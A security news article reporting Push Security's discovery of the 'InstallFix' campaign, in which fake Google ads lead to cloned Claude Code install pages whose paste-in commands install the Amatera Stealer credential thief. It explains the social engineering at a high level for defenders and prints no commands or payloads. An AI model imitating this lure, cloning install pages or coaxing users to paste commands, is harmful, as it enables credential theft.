A new cyberattack campaign called "InstallFix" uses fake Google ads to promote cloned installation pages for AI coding tools like Claude Code. When users copy and paste the malicious installation commands, they unknowingly deploy Amatera Stealer malware, which steals credentials. The attack exploits the common, risky practice of pasting commands directly from websites into terminals. The main topics covered are the specific "InstallFix" attack technique, the use of malvertising and social engineering, and the security risks of copying CLI commands.
'InstallFix' Attacks Spread Fake Claude Code Sites
A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces.
A new variation of the ClickFix technique is capitalizing on the popularity of Anthropic's Claude Code and other AI coding tools.
Researchers at Push Security discovered the threat campaign, which combines malvertising with a social engineering attack. The research team found fake install pages for Claude Code were spreading exclusively through Google-sponsored links for searches such as "Claude Code," "Claude Code install," and "Claude Code CLI."
The cloned installation pages for Anthropic's coding assistant are near-identical to the real thing, Jacques Louw, Push Security co-founder and chief product officer (CPO), explained in a blog post published Friday. But when victims copy the malicious install commands from the clones sites, they deploy the Amatera Stealer malware, which could swipe developers' credentials and give attackers access to enterprise development environments.
While there's nothing revolutionary about this approach, which Push Security calls "InstallFix," Louw explained that attackers have recognized the increased tendency among users to simply copy and paste commands into their systems and execute them. The attacks highlight an insecure practice that has, unfortunately, become the norm these days.
"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you'd only try once before some grizzled senior engineer beat it out of you," Louw wrote. "That's because you're effectively handing a website a blank cheque to execute whatever it wants on your system."
ClickFix & CLI Tools Make a Dangerous Match
ClickFix is a widely used social engineering technique that typically delivers error messages of some kind to convince unsuspecting users to execute malicious commands. The error messages typically feature fake browser updates, but variations of the technique have used everything from phony Blue Screens of Death to audio errors for fake job interviews conducted over videoconferencing.
InstallFix, however, might be the most apt variant yet because it targets a class of user that's probably comfortable with copying and pasting commands. Like many AI coding assistants, Louw explained, Anthropic's recommended install method for Claude Code is pasting and executing a one-line command in a system terminal.
And it's not just AI-coding assistants; Louw wrote that hundreds of the most popular developer and command-line interface (CLI) tools ship with the same installation instructions. Attackers know that this has become a standard practice and are now exploiting it.
"The entire security model boils down to "trust the domain." And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users," Louw wrote.
Capitalizing on Claude Code
According to Push Security, malicious Google ads are an ideal delivery mechanism because, unlike phishing emails, the malicious links won't be caught by email security scans. Plus, the attackers are taking advantage of the increasing interest in Claude Code with the sponsored search results, which appear above organic search results and could fool users who quickly click on a link without realizing it's an ad.
While the InstallFix campaign may seem like it's tailored to take advantage of shadow AI adoption and inexperienced coders, Louw tells Dark Reading that's not necessarily the case. The threat actors behind the campaign are targeting a mainstream AI tool that are likely in use already in many organizations, and the risky path a user takes to install the tool, he says. The scheme can affect both experienced developers and amateur vibe-coders.
"I suspect this campaign is targeting Claude Code specifically, because it's one of the tools (if not the tool) being adopted the fastest across the board," he says. "This is mirrored by the high rate of new account creations we see across our customers for Anthropic products."
Push Security warned that in addition to abusing Google's sponsored links, the threat actors behind the InstallFix attacks are using domains from legitimate providers such as Cloudflare Pages, Tencent EdgeOne, and Squarespace, which appear innocuous and blend in with normal traffic activity. Louw said such abuse has been a common theme that Push Security has observed across virtually every phishing site and malicious link these days.
Users should be extremely cautious when copying and pasting commands into their terminals and should take additional time to verify that the domains providing such commands are in fact authentic. While Push Security provided indicators of compromise (IoCs) for the InstallFix attacks, Louw said the data has limited value because domains for campaigns like this one tend to have a short lifespan.
"This is a fast-moving situation, with domains constantly being spun up," he wrote.
Meridiano
